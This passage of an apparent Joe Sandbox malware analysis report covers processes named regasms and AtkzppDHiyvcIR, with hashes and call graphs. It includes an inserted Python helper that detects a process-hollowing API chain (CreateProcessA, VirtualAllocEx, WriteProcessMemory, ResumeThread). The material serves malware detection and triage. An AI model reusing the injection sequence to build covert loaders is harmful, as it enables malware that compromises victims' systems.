                                  • Opcode ID: 61ff71ed658da65ac306191258d0a6bc250ceecd6a5548746c8f68549df422f4
                                  • Instruction ID: d218e156c6ffb4cda2051affe2e14cac5384d3214007a44f49557b33fcecb701
                                  • Opcode Fuzzy Hash: 61ff71ed658da65ac306191258d0a6bc250ceecd6a5548746c8f68549df422f4
                                  • Instruction Fuzzy Hash: 04D0CDB05EC508DBA3308B5554165313F9AD74F200F8081D29907D6240C62149510672
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1e7bb4c3a732bfef4b0e38412c6787369da37319a345f47094a1e81ec9b7253b
                                  • Instruction ID: 5d84abba65b7090bbd09309f93cd560a822996e3cceb608839c0bc7891197956
                                  • Opcode Fuzzy Hash: 1e7bb4c3a732bfef4b0e38412c6787369da37319a345f47094a1e81ec9b7253b
                                  • Instruction Fuzzy Hash: 5DD0A7D063C1C4C7FA5C3678943DB3971A76B87311FD040E1910F86289ED23B8108293
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 912a0c71023ca8bbd6ada5c2a4ffe937e841cf236fc042bd31056b2ba8f5c68a
                                  • Instruction ID: a96b89fba41c31b1d6a50e4d5cf7f59657480c2298ca4dc9fe627123ecff6395
                                  • Opcode Fuzzy Hash: 912a0c71023ca8bbd6ada5c2a4ffe937e841cf236fc042bd31056b2ba8f5c68a
                                  • Instruction Fuzzy Hash: 1FD05EE0A3C24CEB7A20EA99984123B32ADA74B1F1FD049C2A80B87300E921090353F3
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 050620c84f798c17af0f55e8a33c320413bffc19528e31cb26ea9365f5449aa5
                                  • Instruction ID: 83942b2afc0f31b64b94780930b3825d7d47c97073a4e8744cad73df4a65c37a
                                  • Opcode Fuzzy Hash: 050620c84f798c17af0f55e8a33c320413bffc19528e31cb26ea9365f5449aa5
                                  • Instruction Fuzzy Hash: DDE04FF19157468FD305CF64886626ABBB2BF43210F25C09AD01586215D7301815C792
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f570394f3996d21eae462ea72525c12e68438f40adeed2aad4b592251b883fc5
                                  • Instruction ID: dcda3b54c791e9ae9e9c19e01ae95a3dc7978871c81571851114041bb6713c35
                                  • Opcode Fuzzy Hash: f570394f3996d21eae462ea72525c12e68438f40adeed2aad4b592251b883fc5
                                  • Instruction Fuzzy Hash: 81D0A9D019C3CCEFAB1287A064650A13F382803104B8210E7E087AA883C402488AC3F3
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f17b2522bf0f983177505c7406bfb525d4709c30b7ef6e2839d065eaab78eea8
                                  • Instruction ID: 572a978dd3f696fadc77149dc0e8a823aee69327503b8d18dc2a7661128ace35
                                  • Opcode Fuzzy Hash: f17b2522bf0f983177505c7406bfb525d4709c30b7ef6e2839d065eaab78eea8
                                  • Instruction Fuzzy Hash: E2E0E2B281060CEE8B80FE79D90459A7BE8AB05220F40C56AE8599A110EA30D2E8CF80
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6056cde3b3684b047ba02691f4aed3c2ff7d648b43b01dbb70fde5e6ce35c24c
                                  • Instruction ID: 1306bbf8c5084a407c617b6fdf9b33a0eacae8b1db1229a242774c945682ea6d
                                  • Opcode Fuzzy Hash: 6056cde3b3684b047ba02691f4aed3c2ff7d648b43b01dbb70fde5e6ce35c24c
                                  • Instruction Fuzzy Hash: 62D0A7B471030947A3046FB798173B637DEFB845457C5C018E209CA680CE34D851D715
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3716368a7474ad4a42d393cb2a1b767484979ec4a4ad823d728c0a41e969e9c
                                  • Instruction ID: 4f5ea06ad85a9ce0056b1a75497ea185553a002750ae7c2067ff75a4973e7561
                                  • Opcode Fuzzy Hash: a3716368a7474ad4a42d393cb2a1b767484979ec4a4ad823d728c0a41e969e9c
                                  • Instruction Fuzzy Hash: AAD0126501C3E59FC32217A868090F7BF38590312878940C7F989CD453C95B58D1C2A2
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c60731b22ab3d8c0c83cb379d08c59a481743c82f246f4abcd7249d1a11468a3
                                  • Instruction ID: 6eea162b0218d017539997921d618baeec6443f457e1900fed584a257aa5838d
                                  • Opcode Fuzzy Hash: c60731b22ab3d8c0c83cb379d08c59a481743c82f246f4abcd7249d1a11468a3
                                  • Instruction Fuzzy Hash: D9C012D96FC648CBB01092A8241C6383F5E698F201FD040C7920F4A101DA1288010637
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 435c5ac394920e282c3f473a14d97e37cdeb3d3fca679c65be00c891ac1f70e3
                                  • Instruction ID: 8758f20b4eaa10a81c482435446109055de97a4976ed883da3092a870d9ef044
                                  • Opcode Fuzzy Hash: 435c5ac394920e282c3f473a14d97e37cdeb3d3fca679c65be00c891ac1f70e3
                                  • Instruction Fuzzy Hash: DBC08CF000A782EFE3039A20A8A84592F61AEA320038580C2C154872A3D422092DC3A3
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 87fb2e41a9d9f5670f6e6fb930dd65a93d7be9ef5aea9b3960c4cca0087a0c38
                                  • Instruction ID: 77c881ed695eaf5fc31d339afb9862a362334466cb258246f6f4136de4d48daf
                                  • Opcode Fuzzy Hash: 87fb2e41a9d9f5670f6e6fb930dd65a93d7be9ef5aea9b3960c4cca0087a0c38
                                  • Instruction Fuzzy Hash: 4CC02BB104030ACBE2116BDCF70C32837BD9F00713F880052E60DD1030DB745080C626
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ebd8add632e96f116688b98c4715fde6d80c0d8685e121a20d442cbfc12e9604
                                  • Instruction ID: b008b99b61a76bc4f1b0ed94b613eabd9e2330a959626a0d503c190226ebf8ae
                                  • Opcode Fuzzy Hash: ebd8add632e96f116688b98c4715fde6d80c0d8685e121a20d442cbfc12e9604
                                  • Instruction Fuzzy Hash: 84D012B5418154DFC700CB65DDD5C493FF0BE0E24071549CAD0059B222D330B411CB80
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e0cc8e3f01f315ad389e09353ddde2da8e037c0d8823d54b263d3e3d65f2ab30
                                  • Instruction ID: b13f64471ea85ebd35b19dff825ea811719190fb559247654e21ce040c4e67ef
                                  • Opcode Fuzzy Hash: e0cc8e3f01f315ad389e09353ddde2da8e037c0d8823d54b263d3e3d65f2ab30
                                  • Instruction Fuzzy Hash: E2B012E51FC24CC3351023D460281353F1C300BA00FC000D2A20F70C001901185100F3
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dace693e92c4fc87ff3bb19a49c49a25aee8422216f9e601c52901b02ea8acd0
                                  • Instruction ID: a44c4047b461e4a22edd7b9223076cf8f5c9db5ba648befeaed24253521b6980
                                  • Opcode Fuzzy Hash: dace693e92c4fc87ff3bb19a49c49a25aee8422216f9e601c52901b02ea8acd0
                                  • Instruction Fuzzy Hash: 25B012B51B9701E7B10167F44C85A2A5150EBB2B00FC0CDC633481006099755469D317
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a61180c2a3faa26a2c19e90ee1edc1f58484dff1895ab35a943bb6a3b440d047
                                  • Instruction ID: c84f43d2f59c88a07e981a42c59f15b678d85a33140a192cbe5cc41f66730c0d
                                  • Opcode Fuzzy Hash: a61180c2a3faa26a2c19e90ee1edc1f58484dff1895ab35a943bb6a3b440d047
                                  • Instruction Fuzzy Hash: 3CC08CF0BA0209EFEB008A10DF8296D32726B01E00F510051B2026A184D2605501CA40
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 78d82f78192f4ac627d1e91c98900bafe9b89f9397574a9be70c7478703e9274
                                  • Instruction ID: e63c14035c889345e961961ef971873d04ec91980bb8af80931e0d5ae3faa1e2
                                  • Opcode Fuzzy Hash: 78d82f78192f4ac627d1e91c98900bafe9b89f9397574a9be70c7478703e9274
                                  • Instruction Fuzzy Hash: DFA011A002820CCE22002288A0080BABB3C200220CBC00082EA0ACC008AEAA38208088

                                  Execution Graph

                                  Execution Coverage:30.7%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:100%
                                  Total number of Nodes:8
                                  Total number of Limit Nodes:0
                                  execution_graph 3057 fa32c8 3058 fa3316 NtProtectVirtualMemory 3057->3058 3060 fa3360 3058->3060 3061 fa2e73 3063 fa2eb6 3061->3063 3062 fa326a 3063->3062 3064 fa332f NtProtectVirtualMemory 3063->3064 3065 fa3360 3064->3065

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                   control_flow_graph (rendered graph; edge list not reproduced): function fa2e73-fa338c, 103 basic blocks. Entry block fa2e73-fa2eb4; the chain of validation blocks fa2ec9 … fa3214 all branch on failure to fa322e-fa325d, which falls through to fa3264-fa3268. Block fa3275-fa335e calls NtProtectVirtualMemory and continues to fa3360-fa3366 / fa3367-fa338c.
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 00FA3351
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.1534796820.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_fa0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID: 4|q$D@$D@
                                  • API String ID: 2706961497-3182924711
                                  • Opcode ID: 206e0603b1bb903e4910ed62ccf362b8bd02afceb6c5774bd7f6a0be8f12b817
                                  • Instruction ID: 0c455c31b79cab41e9057393c0108d77c414bc99ed34efb919b358117b65160c
                                  • Opcode Fuzzy Hash: 206e0603b1bb903e4910ed62ccf362b8bd02afceb6c5774bd7f6a0be8f12b817
                                  • Instruction Fuzzy Hash: D1E1B2B6F003044BEB14CABD9C903AE76E76FC5324F698229E915DB7C4EA74DE01A741

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 455 fa32c8-fa335e NtProtectVirtualMemory 458 fa3360-fa3366 455->458 459 fa3367-fa338c 455->459 458->459
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 00FA3351
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.1534796820.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_fa0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 760625f1acf31f707f998059e8ba72c12d4c976b1ce675f674c1839521ad3c56
                                  • Instruction ID: 16ea3b82cad186eae1ae50d672f88738094ddf60dc9bb74cbc09a0fd4e7a64b0
                                  • Opcode Fuzzy Hash: 760625f1acf31f707f998059e8ba72c12d4c976b1ce675f674c1839521ad3c56
                                  • Instruction Fuzzy Hash: BD21C0B1D013499FDB14DFAAD980AEEFBF5FF48310F20842AE519A7250CB759901CBA5

                                  Execution Graph

                                  Execution Coverage:10.3%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:189
                                  Total number of Limit Nodes:9
                                   execution_graph (rendered graph, 189 nodes, 9 limit nodes; edge list not reproduced). API-reaching clusters:
                                   • b94668 / b94778 → b94888, b94878, b944b4 → b95918: CreateActCtxA
                                   • b9b218 → b9b300/b9b304 → b9b548: GetModuleHandleW
                                   • b9d7c8: DuplicateHandle
                                   • b9d580: GetCurrentProcess (b9d5c6), GetCurrentThread (b9d618), GetCurrentProcess (b9d655), GetCurrentThreadId (b9d6b3)
                                   • 72c77c8 → 7608e07 → 7602730 → 76090c0: PostMessageW
                                   • 76061d5 and 76060ff → 7607c20 / 7607c24 (13 API calls each) → helpers 76081a1, 760821d, 7608abd (PostMessageW), 7608019, 76087b7, 7608277, 7608696, 760804f, 760866f, 760816d, 760830c, 760852c, 7608587, 7608526, 76084a3, 7608242, 7608081, which resolve to: CreateProcessA (7605ce8 / 7605cdc), VirtualAllocEx (76059a0 / 7605998), WriteProcessMemory (7605a60 / 7605a59), ReadProcessMemory (7605b50 / 7605b48), Wow64SetThreadContext (76058c0 / 76058c8), ResumeThread (7605811 / 7605818)
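The two findings above are worth checking mechanically rather than by eye: the NtProtectVirtualMemory functions are recovered from a memory dump whose source name carries protection value 0x40 (PAGE_EXECUTE_READWRITE) and is not backed by a PE, and the execution graph for PID 0x15 reaches CreateProcessA, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext and ResumeThread, the classic process-hollowing (RunPE) sequence behind the "Injects a PE file into a foreign processes" signature. The script below is an added example, not Joe Sandbox code: it parses the whitespace-separated execution_graph text the report embeds, maps each API to the function addresses that call it, flags the hollowing chain, and decodes the dotted hex fields of an .sdmp name. The graph snippet is a constructed, trimmed copy of the kind of text on this page; the assumption that field 0 is the PID, field 3 the base address and field 4 the protection is made here (PID and base agree with the hcaresult_<pid>_<n>_<base> snapshot names on the page).

```python
"""Triage helpers for Joe Sandbox execution_graph text and .sdmp dump names.

Added example, not part of the Joe Sandbox report or product. Assumptions:
the execution_graph token stream has the shape `id addr [Api ...] id->id ...`
(with noise such as `2 API calls`), and .sdmp names carry pid, base and
protection at fields 0, 3 and 4.
"""
import re
from collections import defaultdict

# Constructed sample in the shape of the report's execution_graph text.
SAMPLE_GRAPH = (
    "execution_graph 41514 b94668 41515 b9467a 41514->41515 "
    "41539 b95918 CreateActCtxA 41538->41539 "
    "41730 b9b548 GetModuleHandleW 41732 b9b575 41730->41732 "
    "41741 b9d7c8 DuplicateHandle 41742 b9d85e 41741->41742 "
    "41570 76081a1 2 API calls 41568->41570 "
    "41624 7605ce8 CreateProcessA 41623->41624 "
    "41702 76059e0 VirtualAllocEx 41704 7605a1d 41702->41704 "
    "41670 7605aa8 WriteProcessMemory 41672 7605aff 41670->41672 "
    "41710 7605b9b ReadProcessMemory 41712 7605bdf 41710->41712 "
    "41718 76058c5 Wow64SetThreadContext 41720 7605955 41718->41720 "
    "41678 7605818 ResumeThread 41680 7605889 41678->41680 "
    "41691 76090c0 PostMessageW 41692 760912c 41691->41692"
)
# Dump source name taken from this report (NtProtectVirtualMemory function).
SAMPLE_DUMP = "00000014.00000002.1534796820.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp"

_NODE_ID = re.compile(r"^\d+$")
_ADDR = re.compile(r"^[0-9a-f]+$")
_EDGE = re.compile(r"^\d+->\d+$")
# An API token starts with a capital and contains a lowercase letter; this
# rejects Joe's "API"/"calls" filler and bare numbers.
_API = re.compile(r"^[A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*$")


def parse_execution_graph(text):
    """Return {node_id: (address, [api, ...])} from an execution_graph stream."""
    tokens = text.split()
    nodes, current, i = {}, None, 0
    while i < len(tokens):
        tok = tokens[i]
        if _EDGE.match(tok):
            i += 1
            continue
        # A node starts with a decimal id immediately followed by a hex address.
        if _NODE_ID.match(tok) and i + 1 < len(tokens) and _ADDR.match(tokens[i + 1]):
            current = int(tok)
            nodes[current] = (int(tokens[i + 1], 16), [])
            i += 2
            continue
        if current is not None and _API.match(tok):
            nodes[current][1].append(tok)
        i += 1
    return nodes


def api_sites(nodes):
    """Map API name -> sorted list of function addresses that call it."""
    sites = defaultdict(set)
    for addr, apis in nodes.values():
        for api in apis:
            sites[api].add(addr)
    return {api: sorted(addrs) for api, addrs in sites.items()}


# Each step lists interchangeable APIs; together they form the RunPE sequence.
HOLLOWING_CHAIN = [
    ("spawn suspended target", {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}),
    ("allocate in target", {"VirtualAllocEx", "NtAllocateVirtualMemory", "ZwAllocateVirtualMemory"}),
    ("write payload", {"WriteProcessMemory", "NtWriteVirtualMemory", "ZwWriteVirtualMemory"}),
    ("redirect entry point", {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}),
    ("resume target", {"ResumeThread", "NtResumeThread", "ZwResumeThread"}),
]


def detect_process_hollowing(sites):
    """Return (complete, [(step, [apis seen])]); complete when every step is hit."""
    seen = set(sites)
    steps = [(step, sorted(cands & seen)) for step, cands in HOLLOWING_CHAIN]
    return all(hit for _, hit in steps), steps


# PAGE_* protection constants from winnt.h (low byte of the protect field).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}


def decode_dump_name(name):
    """Decode pid, base and protection from a .sdmp name (field layout assumed)."""
    if name.endswith(".sdmp"):
        name = name[:-5]
    fields = name.split(".")
    pid, base, protect = int(fields[0], 16), int(fields[3], 16), int(fields[4], 16)
    return {"pid": pid, "base": base, "protect": protect,
            "protect_name": PAGE_PROTECT.get(protect & 0xFF, "unknown"),
            "executable": bool(protect & 0xF0)}


if __name__ == "__main__":
    sites = api_sites(parse_execution_graph(SAMPLE_GRAPH))
    complete, steps = detect_process_hollowing(sites)
    for step, hit in steps:
        print(f"{step:24s} {', '.join(hit) or '-'}")
    print("process hollowing chain complete:", complete)
    print(decode_dump_name(SAMPLE_DUMP))
```

The chain match deliberately ignores order: Joe's execution graph is a call graph, not a trace, so the only safe claim is that all five capabilities are reachable from the same injector helpers (here 7607c20 / 7607c24). ReadProcessMemory is left out of the chain because it is optional in RunPE (used to read the PEB before patching the image base); treat it as corroboration, not a requirement. A dump decoded as executable and "based on PE: false" is the unpacked stage, which is where the AsyncRAT/VenomRAT configuration extraction should be pointed.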

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1561 b9d570-b9d572 1562 b9d574 1561->1562 1563 b9d576-b9d60f GetCurrentProcess 1561->1563 1562->1563 1568 b9d618-b9d64c GetCurrentThread 1563->1568 1569 b9d611-b9d617 1563->1569 1570 b9d64e-b9d654 1568->1570 1571 b9d655-b9d689 GetCurrentProcess 1568->1571 1569->1568 1570->1571 1572 b9d68b-b9d691 1571->1572 1573 b9d692-b9d6ad call b9d75b 1571->1573 1572->1573 1577 b9d6b3-b9d6e2 GetCurrentThreadId 1573->1577 1578 b9d6eb-b9d74d 1577->1578 1579 b9d6e4-b9d6ea 1577->1579 1579->1578
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00B9D5FE
                                  • GetCurrentThread.KERNEL32 ref: 00B9D63B
                                  • GetCurrentProcess.KERNEL32 ref: 00B9D678
                                  • GetCurrentThreadId.KERNEL32 ref: 00B9D6D1
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 85602eedfe83051da875eb7512a19f82dd86f129e5df03ab444638a1776623f3
                                  • Instruction ID: 23e5688d27401e272c68b08bc33205eb31d26daa64383540aa002863c88b9c80
                                  • Opcode Fuzzy Hash: 85602eedfe83051da875eb7512a19f82dd86f129e5df03ab444638a1776623f3
                                  • Instruction Fuzzy Hash: 7D5159B1D00349CFEB14CFAAD5487AEBBF1EF48304F2484A9E019A73A1D7749944CB66

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1586 b9d580-b9d60f GetCurrentProcess 1590 b9d618-b9d64c GetCurrentThread 1586->1590 1591 b9d611-b9d617 1586->1591 1592 b9d64e-b9d654 1590->1592 1593 b9d655-b9d689 GetCurrentProcess 1590->1593 1591->1590 1592->1593 1594 b9d68b-b9d691 1593->1594 1595 b9d692-b9d6ad call b9d75b 1593->1595 1594->1595 1599 b9d6b3-b9d6e2 GetCurrentThreadId 1595->1599 1600 b9d6eb-b9d74d 1599->1600 1601 b9d6e4-b9d6ea 1599->1601 1601->1600
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00B9D5FE
                                  • GetCurrentThread.KERNEL32 ref: 00B9D63B
                                  • GetCurrentProcess.KERNEL32 ref: 00B9D678
                                  • GetCurrentThreadId.KERNEL32 ref: 00B9D6D1
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_b90000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: ebe7de640054f1a471107290b9e0b5ef33e6a72fae9da0ec07f5afb1d7e929a7
                                  • Instruction ID: 993a920581e08fc111873d35d2a2c2d9a5888d2d64f1f50bfc57244ce98c4715
                                  • Opcode Fuzzy Hash: ebe7de640054f1a471107290b9e0b5ef33e6a72fae9da0ec07f5afb1d7e929a7
                                  • Instruction Fuzzy Hash: 005138B1D00749CFEB14CFAAD548BAEBBF1EF48304F208469E019A7391D7749944CB66

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1659 72c9250-72c9276 1660 72c9333-72c9342 1659->1660 1662 72c934d-72c93ae 1660->1662 1677 72c932a 1662->1677 1679 72c9287-72c9331 1677->1679 1680 72c9280 1677->1680 1679->1677 1680->1660 1680->1679 1681 72c9315-72c9329 1680->1681 1682 72c92b7-72c92d5 1680->1682 1687 72c92dc-72c92e9 1682->1687 1688 72c92d7-72c92da 1682->1688 1689 72c92eb-72c92fa 1687->1689 1688->1689 1692 72c92fc-72c9302 1689->1692 1693 72c9312 1689->1693 1694 72c9304 1692->1694 1695 72c9306-72c9308 1692->1695 1693->1681 1694->1693 1695->1693
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8q$8q$8q
                                  • API String ID: 0-3169173723
                                  • Opcode ID: f447eb3889c187bffe635e439579c348c0069261379bddb5e842694710be3d5a
                                  • Instruction ID: 437a9965ad9ad071b86c8f67d6c03595a37e9e443dd0e537a34393b1967883d5
                                  • Opcode Fuzzy Hash: f447eb3889c187bffe635e439579c348c0069261379bddb5e842694710be3d5a
                                  • Instruction Fuzzy Hash: 0C31C5B4E34206CBDB00DA94C44567D76B1EB96300F50426ED5C7AB3C0DBB1688287A7

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1718 72c839f-72c83d7 1720 72c83e0-72c83e2 1718->1720 1721 72c83fa-72c8417 1720->1721 1722 72c83e4-72c83ea 1720->1722 1726 72c841d-72c8513 1721->1726 1727 72c8582-72c8587 1721->1727 1723 72c83ec 1722->1723 1724 72c83ee-72c83f0 1722->1724 1723->1721 1724->1721
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$$q$$q
                                  • API String ID: 0-3275118826
                                  • Opcode ID: d2c0971ac6a972c3cdaf4a2e53fb2e456d8038e97e5d036d9265d31e36d8c9cb
                                  • Instruction ID: 0b6cc85ebc14154f4db5b75599a841795ea1e81504f0574065a2172cd356bc0e
                                  • Opcode Fuzzy Hash: d2c0971ac6a972c3cdaf4a2e53fb2e456d8038e97e5d036d9265d31e36d8c9cb
                                  • Instruction Fuzzy Hash: 7B01FEB0760346CFE724C628CD267A93371BB20710F19C9A9DD06AF6C1DAF55C90C791

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
